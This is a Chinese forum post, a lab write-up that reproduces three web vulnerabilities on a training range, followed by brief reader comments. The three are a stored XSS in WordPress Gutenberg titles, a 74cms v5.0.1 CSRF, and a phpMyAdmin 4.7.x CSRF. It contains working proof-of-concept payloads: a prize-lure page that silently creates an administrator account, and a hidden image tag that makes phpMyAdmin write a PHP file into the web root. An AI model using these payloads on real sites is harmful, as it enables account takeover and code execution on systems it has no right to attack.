漏洞复现靶场wirteup之一

veek   ·   发表于 2020-10-22 11:22:33   ·   CTF&WP专版

以下复现均在封神台内的靶场中完成,欢迎各位小伙伴前去玩耍。

0x00 WordPress Gutenberg编辑器存储型XSS漏洞

进入到wp的后台页面

选择add new板块,可见在编辑器的Add Title中,后台未对用户输入进行妥善的过滤或者正确转码,导致看到文章的用户都受到恶意代码的影响。

payload:

  1. "><img src=1 onerror=alert("xss")>

复现过程:

点击右上角”Publish”发布后,进入博客主页,出现弹窗:

进一步的利用此处不详述。

0x01 74cms v5.0.1 CSRF 漏洞复现

打开页面

访问构造好的恶意页面:

点击领取后,新管理员被添加。

使用新管理员登陆,可见能够成功登陆:

poc(需手动修改靶场域名):

  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <meta charset="UTF-8">
  5. <title>恭喜你中奖啦</title>
  6. </head>
  7.   <body>
  8. <center> <img src="http://5b0988e595225.cdn.sohucs.com/images/20181224/19d726af92e848b69690d786a5390f66.jpeg"/></center>
  9.     <form action="此处为靶场域名?m=admin&c=admin&a=add" method="POST" id="transfer" name="transfer">
  10.         <input type="hidden" name="username" value="test">
  11.         <input type="hidden" name="email" value="test@test.com">
  12.         <input type="hidden" name="password" value="passwd">
  13.         <input type="hidden" name="repassword" value="passwd">
  14.         <input type="hidden" name="role_id" value="1">
  15.         <input type="hidden" name="submit3" value="添加">
  16. <center><button type="submit" value="Submit">进入领取</button></center>
  17.       </form>
  18.   </body>
  19. </html>

0x02 phpMyAdmin 4.7.x CSRF 复现

此实验最好使用火狐浏览器进行复现,因为Chrome自带站点隔离的安全机制,对该漏洞复现有一定的影响。

进入phpmyadmin管理页面,需登录

该版本pma存在CSRF漏洞,攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL语句。因为我们扮演的便是管理员角色,所以直接访问本地构造好的恶意页面(下方给出POC):

根据我们在poc中设定好的文件写入位置(目前只赋权给了poc中地址),访问php文件:

可见成功运行了恶意代码,写入了测试文件。

poc:

  1. <p>Hello World</p>
  2. <img src="此处为pma靶场网址/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/usr/share/nginx/html/[自定义名称,谨防重复].php';" style="display:none;" />

打赏我,让我更有动力~

3 Reply   |  Until 2020-12-3 | 1257 View

Tkb
发表于 2020-10-22

你所在的用户组无权查看该题目。

评论列表

  • 加载数据中...

编写评论内容

voctor
发表于 2020-10-30

大佬牛逼!!!带带弟弟

评论列表

  • 加载数据中...

编写评论内容

和谐文明
发表于 2020-12-3

????????flag 是啥??

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.